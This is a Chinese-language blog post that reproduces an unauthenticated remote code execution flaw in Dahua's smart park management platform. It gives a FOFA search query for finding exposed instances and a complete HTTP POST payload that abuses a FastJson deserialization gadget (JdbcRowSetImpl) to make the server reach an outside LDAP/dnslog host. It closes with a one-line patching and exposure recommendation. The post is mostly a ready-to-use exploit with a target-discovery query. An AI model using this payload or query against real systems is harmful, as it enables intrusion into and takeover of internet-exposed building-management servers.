Babing
Published on 2024-08-30 / 2 Visits
0
0

D2-3大华-智慧园区综合管理平台-RCE

D2-3大华-智慧园区综合管理平台-RCE

漏洞描述:

由于大华智慧园区综合管理平台使用了存在漏洞的FastJson组件,未经身份验证的攻击者可利用/CardSolution/card/face/sendFaceInfo接口发送恶意的序列化数据执行任意指令,造成代码执行。

网站图片:

image-20240620202032025

网络测绘:

fofa语法:

body=“/WPMS/asset/lib/gridster/”

漏洞复现:

payload:

POST /CardSolution/card/face/sendFaceInfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept-Encoding: gzip
Connection: close
Content-Type: application/json

{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://7iuvk4.dnslog.cn","autoCommit":true}}}

效果图:

Dnslog验证

image-20240620202307653

修复建议:

建议使用相关系统的用户在尽快打补丁的同时,做好访问来源的限制,尽量避免大华智慧园区综合管理平台暴露在公网或不安全的网络环境中。


Comment